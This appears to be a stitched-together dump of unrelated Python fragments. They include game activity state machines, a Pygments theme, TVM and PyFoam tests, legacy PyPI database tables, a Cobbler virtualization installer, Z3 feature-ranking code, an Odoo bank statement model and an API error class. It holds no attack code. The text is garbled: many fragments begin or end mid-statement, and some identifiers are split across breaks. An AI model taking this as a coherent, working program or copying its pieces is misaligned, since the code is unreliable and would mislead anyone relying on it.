yFSMMixins import WaitClientsReadyMixin from activityFSMMixins import WaitForServerMixin class FireworksActivityFSM(BaseActivityFSM, IdleMixin, ActiveMixin, DisabledMixin): notify = DirectNotifyGlobal.directNotify.newCategory('FireworksActivityFSM') def __init__(self, activity): FireworksActivityFSM.notify.debug('__init__') BaseActivityFSM.__init__(self, activity) self.defaultTransitions = {'Idle': ['Active', 'Disabled'], 'Active': ['Disabled'], 'Disabled': []} class CatchActivityFSM(BaseActivityFSM, IdleMixin, ActiveMixin, ConclusionMixin): notify = DirectNotifyGlobal.directNotify.newCategory('CatchActivityFSM') def __init__(self, activity): CatchActivityFSM.notify.debug('__init__') BaseActivityFSM.__init__(self, activity) self.defaultTransitions = {'Idle': ['Active', 'Conclusion'], 'Active': ['Conclusion'], 'Conclusion': ['Idle']} class TrampolineActivityFSM(BaseActivityFSM, IdleMixin, RulesMixin, ActiveMixin): notify = DirectNotifyGlobal.directNotify.newCategory('TrampolineActivityFSM') def __init__(self, activity): TrampolineActivityFSM.notify.debug('__init__') BaseActivityFSM.__init__(self, activity) self.defaultTransitions = {'Idle': ['Rules', 'Active'], 'Rules': ['Active', 'Idle'], 'Active': ['Idle']} class DanceActivityFSM(BaseActivityFSM, IdleMixin, ActiveMixin, DisabledMixin): notify = DirectNotifyGlobal.directNotify.newCategory('DanceActivityFSM') def __init__(self, activity): DanceActivityFSM.notify.debug('__init__') BaseActivityFSM.__init__(self, activity) self.defaultTransitions = {'Active': ['Disabled'], 'Disabled': ['Active']} class TeamActivityAIFSM(BaseActivityFSM, WaitForEnoughMixin, WaitToStartMixin, WaitClientsReadyMixin, ActiveMixin, ConclusionMixin): notify = DirectNotifyGlobal.directNotify.newCategory('TeamActivityAIFSM') def __init__(self, activity): BaseActivityFSM.__init__(self, activity) self.notify.debug('__init__') self.defaultTransitions = {'WaitForEnough': ['WaitToStart'], 'WaitToStart': ['WaitForEnough', 'WaitClientsReady'], 'WaitClientsReady': ['WaitForEnough', 'Active'], 'Active': ['WaitForEnough', 'Conclusion'], 'Conclusion': ['WaitForEnough']} class TeamActivityFSM(BaseActivityFSM, WaitForEnoughMixin, WaitToStartMixin, RulesMixin, WaitForServerMixin, ActiveMixin, ConclusionMixin): notify = DirectNotifyGlobal.directNotify.newCategory('TeamActivityFSM') def __init__(self, activity): BaseActivityFSM.__init__(self, activity) self.defaultTransitions = {'WaitForEnough': ['WaitToStart'], 'WaitToStart': ['WaitForEnough', 'Rules'], 'Rules': ['WaitForServer', 'Active', 'WaitForEnough'], 'WaitForServer': ['Active', 'WaitForEnough'], 'Active': ['Conclusion', 'WaitForEnough'], 'Conclusion': ['WaitForEnough']}
# -*- coding: utf-8 -*- """ tomorrow night blue --------------------- Port of the Tomorrow Night Blue colour scheme https://github.com/chriskempson/tomorrow-theme """ from pygments.style import Style from pygments.token import Keyword, Name, Comment, String, Error, Text, \ Number, Operator, Generic, Whitespace, Punctuation, Other, Literal BACKGROUND = "#002451" CURRENT_LINE = "#00346e" SELECTION = "#003f8e" FOREGROUND = "#ffffff" COMMENT = "#7285b7" RED = "#ff9da4" ORANGE = "#ffc58f" YELLOW = "#ffeead" GREEN = "#d1f1a9" AQUA = "#99ffff" BLUE = "#bbdaff" PURPLE = "#ebbbff" class TomorrownightblueStyle(Style): """ Port of the Tomorrow Night Blue colour scheme https://github.com/chriskempson/tomorrow-theme """ default_style = '' background_color = BACKGROUND highlight_color = SELECTION background_color = BACKGROUND highlight_color = SELECTION styles = { # No corresponding class for the following: Text: FOREGROUND, # class: '' Whitespace: "", # class: 'w' Error: RED, # class: 'err' Other: "", # class 'x' Comment: COMMENT, # class: 'c' Comment.Multiline: "", # class: 'cm' Comment.Preproc: "", # class: 'cp' Comment.Single: "", # class: 'c1' Comment.Special: "", # class: 'cs' Keyword: PURPLE, # class: 'k' Keyword.Constant: "", # class: 'kc' Keyword.Declaration: "", # class: 'kd' Keyword.Namespace: AQUA, # class: 'kn' Keyword.Pseudo: "", # class: 'kp' Keyword.Reserved: "", # class: 'kr' Keyword.Type: YELLOW, # class: 'kt' Operator: AQUA, # class: 'o' Operator.Word: "", # class: 'ow' - like keywords Punctuation: FOREGROUND, # class: 'p' Name: FOREGROUND, # class: 'n' Name.Attribute: BLUE, # class: 'na' - to be revised Name.Builtin: "", # class: 'nb' Name.Builtin.Pseudo: "", # class: 'bp' Name.Class: YELLOW, # class: 'nc' - to be revised Name.Constant: RED, # class: 'no' - to be revised Name.Decorator: AQUA, # class: 'nd' - to be revised Name.Entity: "", # class: 'ni' Name.Exception: RED, # class: 'ne'
Name.Function: BLUE, # class: 'nf' Name.Property: "", # class: 'py' Name.Label: "", # class: 'nl' Name.Namespace: YELLOW, # class: 'nn' - to be revised Name.Other: BLUE, # class: 'nx' Name.Tag: AQUA, # class: 'nt' - like a keyword Name.Variable: RED, # class: 'nv' - to be revised
Name.Variable.Class: "", # class: 'vc' - to be revised Name.Variable.Global: "", # class: 'vg' - to be revised Name.Variable.Instance: "", # class: 'vi' - to be revised Number: ORANGE, # class: 'm' Number.Float: "", # class: 'mf' Number.Hex: "", # class: 'mh' Number.Integer: "", # class: 'mi' Number.Integer.Long: "", # class: 'il' Number.Oct: "", # class: 'mo' Literal: ORANGE, # class: 'l' Literal.Date: GREEN, # class: 'ld' String: GREEN, # class: 's' String.Backtick: "", # class: 'sb' String.Char: FOREGROUND, # class: 'sc' String.Doc: COMMENT, # class: 'sd' - like a comment String.Double: "", # class: 's2' String.Escape: ORANGE, # class: 'se' String.Heredoc: "", # class: 'sh' String.Interpol: ORANGE, # class: 'si' String.Other: "", # class: 'sx' String.Regex: "", # class: 'sr' String.Single: "", # class: 's1' String.Symbol: "", # class: 'ss' Generic: "", # class: 'g' Generic.Deleted: RED, # class: 'gd', Generic.Emph: "italic", # class: 'ge' Generic.Error: "", # class: 'gr' Generic.Heading: "bold " + FOREGROUND, # class: 'gh' Generic.Inserted: GREEN, # class: 'gi' Generic.Output: "", # class: 'go' Generic.Prompt: "bold " + COMMENT, # class: 'gp' Generic.Strong: "bold", # class: 'gs' Generic.Subheading: "bold " + AQUA, # class: 'gu' Generic.Traceback: "", # class: 'gt' }
import unitt
est from PyFoam.Applications.ConvertToCSV import ConvertToCSV theSuite=unittest.Tes
tSuite()
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Arm(R) Ethos(TM)-N integration mean tests""" import numpy as np import tvm from tvm import relay from tvm.testing import requires_ethosn from . import
infrastructure as
tei def _get_model(shape, axis, keepdims, input_zp, input_sc, output_zp, output_sc, dtype): a = relay.var("a", shape=shape, dtype=dtype) casted = relay.op.cast(a, "int32") mean = relay.mean(casted, axis, keepdims) model = relay.qnn.op.requantize( mean, input_scale=relay.const(input_sc, "float32"), input_zero_point=relay.const(input_zp, "int32"), output_scale=relay.const(output_sc, "float32"), output_zero_point=relay.const(output_zp, "int32"), out_dtype=dtype, ) return model @requires_ethosn def test_mean(): trials = [(1, 7, 7, 2048), (1, 8, 8)] np.random.seed(0) for shape in trials: inputs = { "a": tvm.nd.array(np.random.randint(0, high=255, size=shape, dtype="uint8")), } outputs = [] for npu in [False, True]: model = _get_model(shape, [1, 2], True, 128, 0.0784314, 128, 0.0784314, "uint8") mod = tei.make_module(model, []) outputs.append(tei.build_and_run(mod, inputs, 1, {}, npu=npu)) tei.verify(outputs, "uint8", 1)
, onupdate="CASCADE", ondelete="CASCADE", ), ) cookies = Table( "cookies", db.metadata, Column("cookie", Text(), primary_key=True, nullable=False), Column( "name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), Column("last_seen", DateTime(timezone=False)), ) Index("cookies_last_seen", cookies.c.last_seen) csrf_tokens = Table( "csrf_tokens", db.metadata, Column( "name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), primary_key=True, nullable=False, ), Column("token", Text()), Column("end_date", DateTime(timezone=False)), ) description_urls = Table( "description_urls", db.metadata, Column("id", Integer(), primary_key=True, nullable=False), Column("name", Text()), Column("version", Text()), Column("url", Text()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ), ) Index("description_urls_name_idx", description_urls.c.name) Index( "description_urls_name_version_idx", description_urls.c.name, description_urls.c.version, ) dual = Table( "dual", db.metadata, Column("dummy", Integer()), ) mirrors = Table( "mirrors", db.metadata, Column("ip", Text(), primary_key=True, nullable=False), Column("user_name", CIText(), ForeignKey("accounts_user.username")), Column("index_url", Text()), Column("last_modified_url", Text()), Column("local_stats_url", Text()), Column("stats_url", Text()), Column("mirrors_url", Text()), ) oauth_access_tokens = Table( "oauth_access_tokens", db.metadata, Column("token", String(32), primary_key=True, nullable=False), Column("secret", String(64), nullable=False), Column("consumer", String(32), nullable=False), Column("date_created", Date(), nullable=False), Column("last_modified", Date(), nullable=False), Column( "user_name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), ) oauth_consumers = Table( "oauth_consumers", db.metadata, Column("consumer", String(32), primary_key=True, nullable=False), Column("secret", String(64), nullable=False), Column("date_created", Date(), nullable=False), Column( "created_by", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ), ), Column("last_modified", Date(), nullable=False), Column("description", String(255), nullable=False), ) oauth_nonce = Table( "oauth_nonce", db.metadata, Column("timestamp", Integer(), nullable=False), Column("consumer", String(32), nullable=False), Column("nonce", String(32), nullable=False), Column("token", String(32)), ) oauth_request_tokens = Table( "oauth_request_tokens", db.metadata, Column("token", String(32), primary_key=True, nullable=False), Column("secret", String(64), nullable=False), Column("consumer", String(32), nullable=False), Column("callback", Text()), Column("date_created", Date(), nullable=False), Column( "user_name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), ) oid_associations = Table( "oid_associations", db.metadata, Column("server_url", String(2047), primary_key=True, nullable=False), Column("handle", String(255), primary_key=True, nullable=False), Column("secret", LargeBinary(128), nullable=False), Column("issued", Integer(), nullable=False), Column("lifetime", Integer(), nullable=False), Column("assoc_type", String(64), nullable=False), CheckConstraint( "length(secret) <= 128", name="secret_length_constraint", ), ) oid_nonces = Table( "oid_nonces", d
b.metadata, Column("server_url", String(2047), primary_key=True, nullable=False), Column("timestamp", Integer(), primary_key=True, nullable=False), Column("salt", String(40), primary_key=True, nullable=False), ) openid_discovered = Table( "ope
nid_discovered", db.metadata, Column("url", Text(), primary_key=True, nullable=False), Column("created", DateTime(timezone=False)), Column("services", LargeBinary()), Column("op_endpoint", Text()), Column("op_local", Text()), ) openid_nonces = Table( "openid_nonces", db.metadata, Column("created", DateTime(timezone=False)), Column("nonce", Text()), ) Index("openid_nonces_created", openid_nonces.c.created) Index("openid_nonces_nonce", openid_nonces.c.nonce) openid_sessions = Table( "openid_sessions", db.metadata, Column("id", Integer(), primary_key=True, nullable=False), Column("url", Text()), Column("assoc_handle", Text()), Column("expires", DateTime(timezone=False)), Column("mac_key", Text()), ) openid_whitelist = Table( "openid_whitelist", db.metadata, Column("name", Text(), primary_key=True, nullable=False), Column("trust_root", Text(), primary_key=True, nullable=False), Column("created", DateTime(timezone=False)), ) openids = Table( "openids", db.metadata, Column("id", Text(), primary_key=True, nullable=False), Column( "name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), ) ratings = Table( "ratings", db.metadata, Column("id", Integer(), primary_key=True, nullable=False), Column("name", Text(), nullable=False), Column("version", Text(), nullable=False), Column( "user_name", CIText(), ForeignKey( "accounts_user.username", ondelete="CASCADE", ), nullable=False ), Column("date", DateTime(timezone=False)), Column("rating", Integer()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ondelete="CASCADE", ), UniqueConstraint("name", "version", "user_name", name="ratings_name_key"), ) Index("rating_name_version", ratings.c.name, ratings.c.version) rego_otk = Table( "rego_otk", db.metadata, Column( "name", CIText(), ForeignKey( "accounts_user.username", ondelete="CASCADE", ), ), Column("otk", Text()), Column("date", DateTime(timezone=False)), UniqueConstraint("otk", name="rego_otk_unique"), ) Index("rego_otk_name_idx", rego_otk.c.name) Index("rego_otk_otk_idx", rego_otk.c.otk) release_requires_python = Table( "release_requires_python", db.metadata, Column("name", Text()), Column("version", Text()), Column("specifier", Text()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ), ) Index("rel_req_python_name_idx", release_requires_python.c.name) Index( "rel_req_python_name_version_idx", release_requires_python.c.name, release_requires_python.c.version, ) Index("rel_req_python_version_id_idx", release_requires_python.c.version) release_urls = Table( "release_urls", db.metadata, Column("name", Text()), Column("version", Text()), Column("url", Text()), Column("packagetype", Text()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ), ) Index("release_urls_name_idx", release_urls.c.name) Index("release_urls_packagetype_idx", release_urls.c.packagetype) Index("release_urls_version_idx", release_urls.c.version) sshkeys = Table( "sshkeys", db.metadata,
#!/usr/bin/env python import os import os.path path = "source" import doctest for f in os.listdir(path): if f.endswith(".txt"):
print f doctest.testfile(os.path.join(path, f), module_relative=False)
""" Virtualization installation functions. Copyright 2007-2008 Red Hat, Inc. Michael DeHaan <mdehaan@redhat.com> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA module for creating fullvirt guests via KVM/kqemu/qemu requires python-virtinst-0.200. """ import os, sys, time, stat import tempfile import random from optparse import OptionParser import exceptions import errno import re import tempfile import shutil import virtinst import app as koan import sub_process as subprocess import utils def random_mac(): """ from xend/server/netif.py Generate a random MAC address. Uses OUI 00-16-3E, allocated to Xensource, Inc. Last 3 fields are random. return: MAC address string """ mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] return ':'.join(map(lambda x: "%02x" % x, mac)) def start_install(name=None, ram=None, disks=None, mac=None, uuid=None, extra=None, vcpus=None, profile_data=None, arch=None, no_gfx=False, fullvirt=True, bridge=None, virt_type=None, virt_auto_boot=False): vtype = "qemu" if virtinst.util.is_kvm_capable(): vtype = "kvm" arch = None # let virtinst.FullVirtGuest() default to the host arch elif virtinst.util.is_kqemu_capable(): vtype = "kqemu" print "- using qemu hypervisor, type=%s" % vtype if arch is not None and arch.lower() in ["x86","i386"]: arch = "i686" guest = virtinst.FullVirtGuest(hypervisorURI="qemu:///system",type=vtype, arch=arch) if not profile_data.has_key("file"): # images don't need to source this if not profile_data.has_key("install_tree"): raise koan.InfoException("Cannot find install source in kickstart file, aborting.") if not profile_data["install_tree"].endswith("/"): profile_data["install_tree"] = profile_data["install_tree"] + "/" # virt manager doesn't like nfs:// and just wants nfs: # (which cobbler should fix anyway) profile_data["install_tree"] = profile_data["install_tree"].replace("nfs://","nfs:") if profile_data.has_key("file"): # this is an image based installation input_path = profile_data["file"] print "- using image location %s" % input_path if input_path.find(":") == -1: # this is not an NFS path guest.cdrom = input_path else: (tempdir, filename) = utils.nfsmount(input_path) guest.cdrom = os.path.join(tempdir, filename) kickstart = profile_data.get("kickstart","") if kickstart != "": # we have a (windows?) answer file we have to provide # to the ISO. print "I want to make a floppy for %s" % kickstart floppy_path = utils.make_floppy(kickstart) guest.disks.append(virtinst.VirtualDisk(device=virtinst.VirtualDisk.DEVICE_FLOPPY, path=floppy_path)) else: guest.location = profile_data["install_tree"] extra = extra.replace("&","&amp;") guest.extraargs = extra if profile_data.has_key("breed"): breed = profile_data["breed"] if breed != "other" and breed != "": if breed in [ "debian", "suse", "redhat" ]: guest.set_os_type("linux") elif breed in [ "windows" ]: guest.set_os_type("windows") else: guest.set_os_type("unix") if profile_data.has_key("os_version"): # FIXME: when os_version is not defined and it's linux, do we use generic24/generic26 ? version = profile_data["os_version"] if version != "other" and version != "": try: guest.set_os_variant(version) except: print "- virtinst library does not understand variant %s, treating as generic" % version pass guest.set_name(name) guest.set_memory(ram) guest.set_vcpus(vcpus) # for KVM, we actually can't disable this, since it's the only # console it has other than SDL guest.set_graphics("vnc") if uuid is not None: guest.set_uuid(uuid) for d in disks: print "- adding disk: %s of size %s" % (d[0], d[1]) if d[1] != 0 or d[0].startswith("/dev"): guest.disks.append(virtinst.VirtualDisk(d[0], size=d[1])) else: raise koan.InfoException("this virtualization type does not work without a disk image, set virt-size in Cobbler to non-zero") if profile_data.has_key("interfaces"): counter = 0 interfaces = profile_data["interfaces"].keys() interfaces.sort() vlanpattern = re.compile("[a-zA-Z0-9]+\.[0-9]+") for iname in interfaces: intf = profile_data["interfaces"][iname] if intf["bonding"] == "master" or vlanpattern.match(iname) or iname.find(":") != -1: continue mac = intf["mac_address"] if mac == "": mac = random_mac() if bridge is None: profile_bridge = profile_data["virt_bridge"] intf_bridge = intf["virt_bridge"] if intf_bridge == "": if profile_bridge == "": raise koan.InfoException("virt-bridge setting is not defined in cobbler") intf_bridge = profile_bridge else: if bridge.find(",") == -1: intf_bridge = bridge else: bridges = bridge.split(",") intf_bridge = bridges[counter] nic_obj = virtinst.VirtualNetworkInterface(macaddr=mac, bridge=intf_bridge) guest.nics.append(nic_obj) counter = cou
nter + 1 else: if bridge is not None:
profile_bridge = bridge else: profile_bridge = profile_data["virt_bridge"] if profile_bridge == "": raise koan.InfoException("virt-bridge setting is not defined in cobbler") nic_obj = virtinst.VirtualNetworkInterface(macaddr=random_mac(), bridge=profile_bridge) guest.nics.append(nic_obj) guest.start_install() return "use virt-manager and connect to qemu to manage guest: %s" % name
features[str(feature)] = currWeight sorted_features = sorted(features.iteritems(), key=operator.itemgetter(1)) sorted_features = [(features_str[f],abs(w)) for (f, w) in sorted_features] #sorted_features.reverse() return sorted_features def getBestForAbsoluteNormalized(weights, ranges, num_consumers): ''' weights is a list of triples: (objective, weight, feature) Sort features according to weights, where the weight of a feature is defined as: weight(f:feature) = abs(Sum("f's weights in maximize objectives") - Sum("f's weights in minimize objectives")) ...might be better to look at std dev. ''' features = {} features_str = {} #print weights (maxes, mins) = ranges metrics_variables_string = [str(i) for i in metrics_variables] #print weights for i in weights: (objective, weight, feature) = i if features.get(str(feature)): currWeight = features[str(feature)] else: currWeight = 0 features_str[str(feature)] = feature #print objective polarity = metrics_objective_direction[metrics_variables_string.index(str(objective))] #print objective if maxes[str(objective)] - mins[str(objective)] == 0: currWeight = currWeight + 1 elif(polarity == METRICS_MAXIMIZE): currWeight = currWeight + (float(weight) - mins[str(objective)]) / (maxes[str(objective)] - mins[str(objective)]) else: currWeight = currWeight + (maxes[str(objective)] - float(weight)) / (maxes[str(objective)] - mins[str(objective)]) features[str(feature)] = currWeight sorted_features = sorted(features.iteritems(), key=operator.itemgetter(1)) sorted_features = [(features_str[f],abs(w)) for (f, w) in sorted_features] #print sorted_features #sorted_features.reverse()
return sorted_features def getBestMinusWorst(weights, ranges, num_consumers): features = {} features_str = {} #print weights
(maxes, mins) = ranges metrics_variables_string = [str(i) for i in metrics_variables] #print weights for i in weights: (objective, weight, feature) = i if features.get(str(feature)): currWeight = features[str(feature)] else: currWeight = (1, 0) features_str[str(feature)] = feature #print objective (currMin, currMax) = currWeight polarity = metrics_objective_direction[metrics_variables_string.index("total_" + str(objective))] #print objective if maxes[str(objective)] - mins[str(objective)] == 0: denom = 1 else: denom = (maxes[str(objective)] - mins[str(objective)]) if(polarity == METRICS_MAXIMIZE): newWeight = (float(weight) - mins[str(objective)]) /denom else: newWeight = (maxes[str(objective)] - float(weight)) / denom #print features #print(newWeight if newWeight < currMin else currMin) #print newWeight features[str(feature)] = (newWeight if newWeight < currMin else currMin, newWeight if newWeight > currMax else currMax) for i in features.keys(): (l, r) = features.get(i) features[i] = r - l sorted_features = sorted(features.iteritems(), key=operator.itemgetter(1)) sorted_features = [(features_str[f],abs(w)) for (f, w) in sorted_features] #print sorted_features #sorted_features.reverse() return sorted_features def getBestByName(num_consumers, weights, names): #need to clean features=[] for i in weights: (name, weight) = i if str(name) in names: #print name features.append((name,weight)) ''' while names: for i in weights: (_, _, feature) = i if str(feature) == names[0]: print names[0] features.append((feature,1)) names.pop(0) break ''' #print features return features def getBestFeatures(heuristic, weights, ranges, num_consumers, names): if heuristic == GREATEST_TOTAL_WEIGHT: print("Obsolete, do not use. ") #sys.exit() return getBestForGreatestTotalWeight(num_consumers) elif heuristic == ABSOLUTE_NORMALIZED: return getBestForAbsoluteNormalized(weights, ranges, num_consumers) elif heuristic == BY_NAME: #initial_list = getBestForAbsoluteNormalized(weights, ranges, num_consumers) #initial_list.reverse() initial_list = getBestMinusWorst(weights, ranges, num_consumers) return getBestByName(num_consumers, initial_list, names) def getZ3Feature(feature, expr): if(str(expr) == feature): return expr for child in expr.children(): result = getZ3Feature(feature, child) if result: return result return [] ABSOLUTE_NORMALIZED = 1 GREATEST_TOTAL_WEIGHT = 2 BY_NAME = 3 CONFIG=False RECORDPOINT = False if __name__ == '__main__': print("Running: " + str(sys.argv)) if len(sys.argv) < 6: RECORDPOINT= False elif sys.argv[5] == "1": RECORDPOINT = True if sys.argv[4] == "1": CONFIG = True else: CONFIG = False #print CONFIG if sys.argv[4] == "2": BETTER_CONFIG = True else: BETTER_CONFIG = False if sys.argv[1] == "BDB": from Z3ModelBerkeleyDB import * csvfile = './bdb_attributes.csv' if CONFIG: names = bdb_config_split_names elif BETTER_CONFIG: sys.exit("bdb not set up for better config.") else: names = bdb_optional_names elif sys.argv[1] == "ERS": csvfile = './ers_attributes.csv' from Z3ModelEmergencyResponseOriginal import * if CONFIG: names = ers_config_split_names elif BETTER_CONFIG: names = ers_better_config_names else: names = ers_optional_names elif sys.argv[1] == "ESH": RECORDPOINT=True from Z3ModelEShopOriginal import * csvfile = './eshop_attributes.csv' if CONFIG: names = eshop_config_split_names elif BETTER_CONFIG: names = eshop_better_config_names else: names = eshop_optional_names elif sys.argv[1] == "WPT": csvfile = './wpt_attributes.csv' from Z3ModelWebPortalUpdate import * #names=["ban_flash", "keyword", "popups", "text"] if CONFIG: names = webportal_config_split_names elif BETTER_CONFIG: names = webportal_better_config_names else: names = webportal_optional_names else: print("passed") sys.exit() outputFileParentName = sys.argv[2] num_consumers = int(sys.argv[3]) num_groups = num_consumers / 2 if not is_power2(num_consumers): sys.exit("Number of consumers must be a power of 2.") weights = extractWeights(csvfile) #print weights ranges = getWeightRanges(weights) sorted_features = getBestFeatures(BY_NAME, weights, ranges, num_consumers, names) num_desired_features = int(math.log(num_consumers, 2))-1 #i didnt reverse, but also try middle of the pack sorted_features.reverse() print sorted_features #random.shuffle(sorted_features) desired_features = [i for (i, _) in sorted_features][:num_desired_features] #desired_features = [i for (i, _) in sorted_features][(len(sorted_features)-num_desired_features)/2: # (len(sorted_features)-num_desired_features)/2 + num_desired_features] #print desired_features new_desired_features= [] for i in desired_features: for j in s.assertions(): result = getZ3Feature(i, j) if result: new_desired_features.append(result) break desired_features = new_desired_features
import load
_data as ld import sys import os f_list = os.listdir(sys.argv[1]) data = ld.loadIntoPandas(ld.processAllDocume
nts(sys.argv[1], f_list)) data.to_pickle(sys.argv[2])
from fractions import gcd def greatest_common_divisor(*args): args = list(args) a, b = args.pop(), a
rgs.pop() gcd_local = gcd(a, b) while len(args): gcd_local = gcd(gcd_local, args.pop()) return gcd_local def test_function(): assert greatest_common_divisor(6, 10, 15) == 1, "12" assert greatest_common_divisor(6, 4) =
= 2, "Simple" assert greatest_common_divisor(2, 4, 8) == 2, "Three arguments" assert greatest_common_divisor(2, 3, 5, 7, 11) == 1, "Prime numbers" assert greatest_common_divisor(3, 9, 3, 9) == 3, "Repeating arguments" if __name__ == '__main__': test_function()
ass AccountBankStatementLine(models.Model): _name = "account.bank.statement.line" _description = "Bank Statement Line" _order = "statement_id desc, sequence" _inherit = ['ir.needaction_mixin'] name = fields.Char(string='Memo', required=True) date = fields.Date(required=True, default=lambda self: self._context.get('date', fields.Date.context_today(self))) amount = fields.Monetary(digits=0, currency_field='journal_currency_id') journal_currency_id = fields.Many2one('res.currency', related='statement_id.currency_id', help='Utility field to express amount currency', readonly=True) partner_id = fields.Many2one('res.partner', string='Partner') bank_account_id = fields.Many2one('res.partner.bank', string='Bank Account') account_id = fields.Many2one('account.account', string='Counterpart Account', domain=[('deprecated', '=', False)], h
elp="This technical field can be used at the statement line creation/import time in order to avoid the reconciliation" " process on it later on. The statement line will simply create a counterpart on this account") statement_id = fields
.Many2one('account.bank.statement', string='Statement', index=True, required=True, ondelete='cascade') journal_id = fields.Many2one('account.journal', related='statement_id.journal_id', string='Journal', store=True, readonly=True) partner_name = fields.Char(help="This field is used to record the third party name when importing bank statement in electronic format," " when the partner doesn't exist yet in the database (or cannot be found).") ref = fields.Char(string='Reference') note = fields.Text(string='Notes') sequence = fields.Integer(index=True, help="Gives the sequence order when displaying a list of bank statement lines.", default=1) company_id = fields.Many2one('res.company', related='statement_id.company_id', string='Company', store=True, readonly=True) journal_entry_ids = fields.One2many('account.move', 'statement_line_id', 'Journal Entries', copy=False, readonly=True) amount_currency = fields.Monetary(help="The amount expressed in an optional other currency if it is a multi-currency entry.") currency_id = fields.Many2one('res.currency', string='Currency', help="The optional other currency if it is a multi-currency entry.") @api.one @api.constrains('amount') def _check_amount(self): # This constraint could possibly underline flaws in bank statement import (eg. inability to # support hacks such as using dummy transactions to give additional informations) if self.amount == 0: raise ValidationError(_('A transaction can\'t have a 0 amount.')) @api.one @api.constrains('amount', 'amount_currency') def _check_amount_currency(self): if self.amount_currency != 0 and self.amount == 0: raise ValidationError(_('If "Amount Currency" is specified, then "Amount" must be as well.')) @api.multi def unlink(self): for line in self: if line.journal_entry_ids.ids: raise UserError(_('In order to delete a bank statement line, you must first cancel it to delete related journal items.')) return super(AccountBankStatementLine, self).unlink() @api.model def _needaction_domain_get(self): return [('journal_entry_ids', '=', False), ('account_id', '=', False)] @api.multi def button_cancel_reconciliation(self): # TOCKECK : might not behave as expected in case of reconciliations (match statement line with already # registered payment) or partial reconciliations : it will completely remove the existing payment. move_recs = self.env['account.move'] for st_line in self: move_recs = (move_recs | st_line.journal_entry_ids) if move_recs: for move in move_recs: move.line_ids.remove_move_reconcile() move_recs.write({'statement_line_id': False}) move_recs.button_cancel() move_recs.unlink() #################################################### # Reconciliation interface methods #################################################### @api.multi def get_data_for_reconciliation_widget(self, excluded_ids=None): """ Returns the data required to display a reconciliation widget, for each statement line in self """ excluded_ids = excluded_ids or [] ret = [] for st_line in self: aml_recs = st_line.get_reconciliation_proposition(excluded_ids=excluded_ids) target_currency = st_line.currency_id or st_line.journal_id.currency_id or st_line.journal_id.company_id.currency_id rp = aml_recs.prepare_move_lines_for_reconciliation_widget(target_currency=target_currency, target_date=st_line.date) excluded_ids += [move_line['id'] for move_line in rp] ret.append({ 'st_line': st_line.get_statement_line_for_reconciliation_widget(), 'reconciliation_proposition': rp }) return ret def get_statement_line_for_reconciliation_widget(self): """ Returns the data required by the bank statement reconciliation widget to display a statement line """ statement_currency = self.journal_id.currency_id or self.journal_id.company_id.currency_id if self.amount_currency and self.currency_id: amount = self.amount_currency amount_currency = self.amount amount_currency_str = amount_currency > 0 and amount_currency or -amount_currency amount_currency_str = formatLang(self.env, amount_currency_str, currency_obj=statement_currency) else: amount = self.amount amount_currency_str = "" amount_str = formatLang(self.env, abs(amount), currency_obj=self.currency_id or statement_currency) data = { 'id': self.id, 'ref': self.ref, 'note': self.note or "", 'name': self.name, 'date': self.date, 'amount': amount, 'amount_str': amount_str, # Amount in the statement line currency 'currency_id': self.currency_id.id or statement_currency.id, 'partner_id': self.partner_id.id, 'journal_id': self.journal_id.id, 'statement_id': self.statement_id.id, 'account_code': self.journal_id.default_debit_account_id.code, 'account_name': self.journal_id.default_debit_account_id.name, 'partner_name': self.partner_id.name, 'communication_partner_name': self.partner_name, 'amount_currency_str': amount_currency_str, # Amount in the statement currency 'has_no_partner': not self.partner_id.id, } if self.partner_id: if amount > 0: data['open_balance_account_id'] = self.partner_id.property_account_receivable_id.id else: data['open_balance_account_id'] = self.partner_id.property_account_payable_id.id return data @api.multi def get_move_lines_for_reconciliation_widget(self, excluded_ids=None, str=False, offset=0, limit=None): """ Returns move lines for the bank statement reconciliation widget, formatted as a list of dicts """ aml_recs = self.get_move_lines_for_reconciliation(excluded_ids=excluded_ids, str=str, offset=offset, limit=limit) target_currency = self.currency_id or self.journal_id.currency_id or self.journal_id.company_id.currency_id return aml_recs.prepare_move_lines_for_reconciliation_widget(target_currency=target_currency, target_date=self.date) #################################################### # Reconciliation methods #################################################### def get_move_lines_for_reconciliation(self, excluded_ids=None, str=False, offset=0, limit=None, additional_domain=None, overlook_partner=False): """ Return account.move.line records which can be used for bank statement reconciliation. :param excluded_ids:
class APIError(Exception): """Represents an error returned in a response to a fleet API call This exception will be raised any time a response code >= 400 is returned Attributes: code (int): The response code message(str): The message included with the error response http_error(googleapiclient.errors.HttpError): The underlying exception that caused this exception to be raised
